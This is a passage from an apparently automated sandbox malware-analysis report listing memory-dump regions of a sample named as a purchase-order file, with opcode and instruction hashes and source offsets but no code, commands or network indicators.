                                                          • Opcode Fuzzy Hash: 19e3b4f8720f4de3f6640a6a302fc28bb1d0d73da8451e0b3e23dd032ebaeec7
                                                          • Instruction Fuzzy Hash: D6F0583AF04208CBCB18DFA9F8804DCF3B3FBC8326B24C163C10992619E73055168B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f65bc82b013368ba68f9a7d80175ec044b14e3eaec65f8b67d7c28aa1b777cf
                                                          • Instruction ID: 84c99699ce8f6ba28b434faa165c8c952c1ce9e872946d1b134333b553c700c2
                                                          • Opcode Fuzzy Hash: 2f65bc82b013368ba68f9a7d80175ec044b14e3eaec65f8b67d7c28aa1b777cf
                                                          • Instruction Fuzzy Hash: E6011D70908298CFEB64CF18C884BD97BB1BB49305F5494E9D40DA7344DBB459C4CF46
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 278eac62079b1bfb7244e26dd8ee191f4c2577548d12dd59c758656a994a0fa9
                                                          • Instruction ID: d748f38a118f536178cbf2da65d30b6959f9bcc76ad382aad6eb60af2c216757
                                                          • Opcode Fuzzy Hash: 278eac62079b1bfb7244e26dd8ee191f4c2577548d12dd59c758656a994a0fa9
                                                          • Instruction Fuzzy Hash: 9FF0A074906108EFC704DFA8D442BADBBF8EB48300F14C0AAD80893341CA31AA42DB81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 36d1b76e2c3cf2ab7410c1557f4122d9dc7d73f0f697f20b9dc3da7e9ff5f2cc
                                                          • Instruction ID: dc5675dad95f22cea469f9f09bb1efc695ac4db3ec9067a97b0ea6d8d282c1ce
                                                          • Opcode Fuzzy Hash: 36d1b76e2c3cf2ab7410c1557f4122d9dc7d73f0f697f20b9dc3da7e9ff5f2cc
                                                          • Instruction Fuzzy Hash: E0F082325196C09FE716DB64CC4EA08BFB0EF56315F2A40EBE085CF2A3D626D806CB11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9eec16ed0a010170859a726bdf037ee8a0747a62d241ad5a7324cf96e471816
                                                          • Instruction ID: 4b11fdab75d86594c3f1b13519eeba226151143196e6c7f0ee5408868f1043e0
                                                          • Opcode Fuzzy Hash: f9eec16ed0a010170859a726bdf037ee8a0747a62d241ad5a7324cf96e471816
                                                          • Instruction Fuzzy Hash: 1001DA78910218DFDB68DF18D858AD9B7B1FB88340F0080D6E54DA3354DB749E85DF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fabbcda9d889e8910b532ea3c1a3ffc51af9098d7d36e0dc965178faa2c4356c
                                                          • Instruction ID: 57f5bf4aebdb3e193f32363d9bb86847e8649479a3624be51ce318722685f53c
                                                          • Opcode Fuzzy Hash: fabbcda9d889e8910b532ea3c1a3ffc51af9098d7d36e0dc965178faa2c4356c
                                                          • Instruction Fuzzy Hash: C2F08C3AB04208CBCB24DFA8F8804DCF3B2FB88326B24C562C50993608D73055198B51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16912e42b70d4f11386c453e9d7398102e73560b50f471b46ae1d20172816b3b
                                                          • Instruction ID: 40e9969ad9f8faf6ccc301cea06407178ae8142913931000b371a6a3d882c8b4
                                                          • Opcode Fuzzy Hash: 16912e42b70d4f11386c453e9d7398102e73560b50f471b46ae1d20172816b3b
                                                          • Instruction Fuzzy Hash: D4F01575D05208EBCB15DFB9C941BADBBB9EB48300F10C4AAA944A2300D67A9A41DF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: adef7725ef4628ccfe10853f28ffd03b65de595fa754f1fc1e1e3b55256f5a1c
                                                          • Instruction ID: fbad8ee51b7be3c41e9defae89ab872c704fd05f3a624e70fbdd292303c2afac
                                                          • Opcode Fuzzy Hash: adef7725ef4628ccfe10853f28ffd03b65de595fa754f1fc1e1e3b55256f5a1c
                                                          • Instruction Fuzzy Hash: 99E026A290D180CBE70E97386CE21623FA1EA9219438851C5F8489B175F63CA503E752
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb4c31b854d7734883eaa5306dfab933fdfca56253c3e22d381eaacc18334de7
                                                          • Instruction ID: 84562f1a4e2f20abffba71c2be9af768bedc7dad26efcdfd70ceb0507c45abfd
                                                          • Opcode Fuzzy Hash: bb4c31b854d7734883eaa5306dfab933fdfca56253c3e22d381eaacc18334de7
                                                          • Instruction Fuzzy Hash: D7E06534808108FBCF01DFD4E940AADBF76FB48310F10C09AEC4423251CBB29A61EB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 65499e43792201c366b0210282adaf8c6d44908f7f8a9c0cd7237d4caebf1e48
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: 30E0C274E05208EFCB44DFA8D540AADBBF5EB88314F20C0AA9C49A3341D736AE51DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 0edc99eee0c8bc24a937a77809ce4242f2b8a13359683bd77b0505678022737e
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: A9E0C274E05208EFCB44DFA8E540AADBBF5EB48310F14D0AA9849A3341D6769A51EF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: a3ebdff649d6b3cee34082119580fdd33ff7debbe451adcc0b3ca4247d3ab902
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: 97E0C974D45208EFCB84DFA8D544AADBBF5EB48310F14C1AA985893341D6359E51DF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction ID: 93917f9b5e6b44ea5e8c2084cb5cdd16a8fba98da0f23e0f3617c3fcd0128f6f
                                                          • Opcode Fuzzy Hash: 7bb08d20aa84d90a705d9c7aa5f751a83564818ad5e1c7afba0ec8119fbc581a
                                                          • Instruction Fuzzy Hash: A1E0C274E05208EFCB84EFA8D540AADBBF5EB48310F10C0AA9858A3341D6369A51DF84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99b951520f13ffafac28fe9f094863923001bb0b566b9e12539e98cdabd47f83
                                                          • Instruction ID: dc2d82bb50c236e3014d4f2b2db0b6807fbb650c4bcf40d21059a474b769801e
                                                          • Opcode Fuzzy Hash: 99b951520f13ffafac28fe9f094863923001bb0b566b9e12539e98cdabd47f83
                                                          • Instruction Fuzzy Hash: 93E020303495809FD718CF25F4997EA33D39791301F2C4279C109C39AEE6F54842C518
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a87b434fceb167a36eae10019da8c22706efaa0bd7f1aa470b419fd9a688f98a
                                                          • Instruction ID: 6e80d8354d00aa8df84df0a86c5706ab653dfd3e357706584d3c6f427c2bcd0c
                                                          • Opcode Fuzzy Hash: a87b434fceb167a36eae10019da8c22706efaa0bd7f1aa470b419fd9a688f98a
                                                          • Instruction Fuzzy Hash: 92E0E574D09108EFC745DFA8D540AADBBB8EB48300F14C0AAE84997342DA31AA51DF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83095de54b09146443b708259adc94a96954f5cc0f6222ae960b4776a6310a42
                                                          • Instruction ID: 8babef39f52a7c569402431f47fa0f89bf9d25130a6a44285fddb29e11cdfc6c
                                                          • Opcode Fuzzy Hash: 83095de54b09146443b708259adc94a96954f5cc0f6222ae960b4776a6310a42
                                                          • Instruction Fuzzy Hash: 26F06270D4126A8FDB65DF54D888BEDBAB1BB48318F2558E9D419A2250D7345EC0CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74473865e8d28683c78fe5b7b2a570838af1f33d05dacd2cffcfa135a5b0cd30
                                                          • Instruction ID: b1668c4896d75cde24759586bb5722a8bcbf4e9842d7f7687747401f6b31cf40
                                                          • Opcode Fuzzy Hash: 74473865e8d28683c78fe5b7b2a570838af1f33d05dacd2cffcfa135a5b0cd30
                                                          • Instruction Fuzzy Hash: D9E0E574D05208EFCB55DFE8D5406ADBBB5EB49300F1084AAD808A3300D7369A51DF95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e7247a1374769379306e881f2549cda3915fce1b83e3cd23cbb9380d5e3c5a4
                                                          • Instruction ID: 70e3a8e42f4bae917234b8f76307dcd1989913ab47ed63d9424ae1fbf00dc375
                                                          • Opcode Fuzzy Hash: 5e7247a1374769379306e881f2549cda3915fce1b83e3cd23cbb9380d5e3c5a4
                                                          • Instruction Fuzzy Hash: 79E09234909208DFCF02DFA4DA409ADBF71EB6A311F14C49AD84867751C7329E55DB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction ID: 2fda885d3a5a1b67c792496d8c72ce2e3378bf3a6c328416447c939182a4480d
                                                          • Opcode Fuzzy Hash: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction Fuzzy Hash: 04E0E574E05208EFCB44EFA8D5416ACFBF4EB48310F20C0EAD808A3351D635AA42CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44b14ddbd25074a2eccb79ad554fcda1e662a8abcf306a1e7a32687a6440bc37
                                                          • Instruction ID: 2195570c94c04c937191863382262c9664196204509241b93d7e6519592151c7
                                                          • Opcode Fuzzy Hash: 44b14ddbd25074a2eccb79ad554fcda1e662a8abcf306a1e7a32687a6440bc37
                                                          • Instruction Fuzzy Hash: 63F05870A063449FD3548B24C9993997BB1AB46300F1480E5E08EA3265CE34AD89CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5fe63e2f2d733acffcd324e943f7480d17bf8ae7eae7f4c5a83c8c82b74cead
                                                          • Instruction ID: e08af726f1ee7bf824c7fbf99faf060d08d32c2c65ae96803df6535637685849
                                                          • Opcode Fuzzy Hash: a5fe63e2f2d733acffcd324e943f7480d17bf8ae7eae7f4c5a83c8c82b74cead
                                                          • Instruction Fuzzy Hash: 0DE04871A05348AFC704DB74D95166D7BB5DB85200F4594DDF404DB251EA356F009751
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction ID: 9cdaba20123e2df3f8ec8aca46b8301707e5ebf5c55cc13c7d52de03c730d0c4
                                                          • Opcode Fuzzy Hash: d6982ad80141bf1407af9caa1a7aa9b85c2a7f71f47b6f9917418de139ae6f77
                                                          • Instruction Fuzzy Hash: ABE0E574E0520CEFCB44DFA8D5406ACBBF4EB89310F10C4EAD80893341D636AA42CF80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4e53103b11a3661ca55e5a772508aa7c63f84aa31b2a26957cae9ddc1fc27cd
                                                          • Instruction ID: 3665f27863fb49bc09b33069c15feaadc24e02cbdd941fd5bc20fd04100fd1de
                                                          • Opcode Fuzzy Hash: b4e53103b11a3661ca55e5a772508aa7c63f84aa31b2a26957cae9ddc1fc27cd
                                                          • Instruction Fuzzy Hash: 45E08CB6E04208DFCB50DFBCE9916DC7BF2EB95305B1495A9D008D7362EA300F06AB51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c86ea062dd33a0155c03d716ba3f63ddba62b3ecb72c90f5be2b2e07316756
                                                          • Instruction ID: a9528ee781cd086f279bb0c56712c09eecf6927fdec658817a47bf1f3f3c8d59
                                                          • Opcode Fuzzy Hash: a8c86ea062dd33a0155c03d716ba3f63ddba62b3ecb72c90f5be2b2e07316756
                                                          • Instruction Fuzzy Hash: A1E0863450D1489FD301CB98D9056697FBCD74A200F1584DFD4085B382D6329E01CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa152fe3712fde26ce471cdda15859346c01cef7058e4f2e7e9617c76f8fb955
                                                          • Instruction ID: 2d6e197000dd9d66f38c80409d4ed0b38e85ab487a55238fd4aa0aaf23a8e508
                                                          • Opcode Fuzzy Hash: aa152fe3712fde26ce471cdda15859346c01cef7058e4f2e7e9617c76f8fb955
                                                          • Instruction Fuzzy Hash: 86F06274904258DFCB19DF69D484B98BBB2FB49300F0094A6E449A7225DBB55D84CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 710cb3c7e03ef6afcf7c4407250a7e21379358998339a4dd31a6154262596287
                                                          • Instruction ID: b2a9322e65f984608fd1234292125b6fa2166b301b6748def0fafb8f66a324e9
                                                          • Opcode Fuzzy Hash: 710cb3c7e03ef6afcf7c4407250a7e21379358998339a4dd31a6154262596287
                                                          • Instruction Fuzzy Hash: C5E01A70D4520CEFCB54EFA8D0446ACBBB5EB48310F5080EAD809A3340D775AA40CF91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4e3811a8301fa39f17b5735360651402e4f8d4025b872c3127d39e69142bff8
                                                          • Instruction ID: 5032fcc7769e498e99acd6e7411b45aa7d165395e13e50e11e43041f30154449
                                                          • Opcode Fuzzy Hash: e4e3811a8301fa39f17b5735360651402e4f8d4025b872c3127d39e69142bff8
                                                          • Instruction Fuzzy Hash: 08E06D301042459BC754EBACC5C4BA8BBE1EB06228F2446E998588B293C7326943CB41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b3ea031adb62438790dd7dc80d7d49efd7ef0f502704cbd13821745fe01d88a8
                                                          • Instruction ID: eb7dc551eb17749cecf8930fa570c1b4f72b8e14618f00a2207278f2618a4581
                                                          • Opcode Fuzzy Hash: b3ea031adb62438790dd7dc80d7d49efd7ef0f502704cbd13821745fe01d88a8
                                                          • Instruction Fuzzy Hash: 19E0C23480A208DFCB40DBA8C5456BCBFB4EB09310F1080DACC4853342EA729E41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f1e4101259f69d7246275fa67f2ca856a7019a9fa399176a4cac89613c9c7f5
                                                          • Instruction ID: f4fdebf1698608b4becd249bd3d2ce88ed9e2e24e4566bd464f601745e62c03f
                                                          • Opcode Fuzzy Hash: 4f1e4101259f69d7246275fa67f2ca856a7019a9fa399176a4cac89613c9c7f5
                                                          • Instruction Fuzzy Hash: 48E01A34904204CFEB658F28E880365B371FB41321FA48AA9E489A6664CB79DDC5DF24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8dc9554f3ddf9a093f0ab2dc83d0b5cf75cfe9f0e845ea876bf1f1659c3fa802
                                                          • Instruction ID: 09fae5b0bfc4679fb4360a2c96f8226835c8dbdf930a4406985571b88f18d233
                                                          • Opcode Fuzzy Hash: 8dc9554f3ddf9a093f0ab2dc83d0b5cf75cfe9f0e845ea876bf1f1659c3fa802
                                                          • Instruction Fuzzy Hash: 75E06578A00208CBDF04DFA4E8847AC73B0FB85301F208528E008A7265CB78A982CB24
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction ID: 79485984969cf6e77468beadde8bdcf2e3866a6a817eb9e6c426f6e5d65ad5df
                                                          • Opcode Fuzzy Hash: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction Fuzzy Hash: 96D05E34509108DBC704DA98D541A6DBBACEB86214F1084DE980957341CA729E02CB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction ID: 320db25866ebacaaf744ed3c91fa9f4e466b3406976e74858298f6b9c3fa8606
                                                          • Opcode Fuzzy Hash: 0fbc0711ef9d3b8128c62036608f72a03fb221282242e1b2e12b44c025bd2cff
                                                          • Instruction Fuzzy Hash: DED0A730509108EBC744DB99D551A79BBFDEB46318F5084DDD80967351CB739D01CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6006cbf9daf3204142d02bb6fc0f350f0cf89c2883b8aa30096a02a26c16975
                                                          • Instruction ID: 58c67103cb7d9b9a7ca783e4e418e8437f7484977fe6ec6e37d70b37f8c59d62
                                                          • Opcode Fuzzy Hash: f6006cbf9daf3204142d02bb6fc0f350f0cf89c2883b8aa30096a02a26c16975
                                                          • Instruction Fuzzy Hash: 0CE0EC71A01108ABCB04DBA8D55169DBBF5EB44200F108599E808A7341EA756E009791
                                                          Memory Dump Source
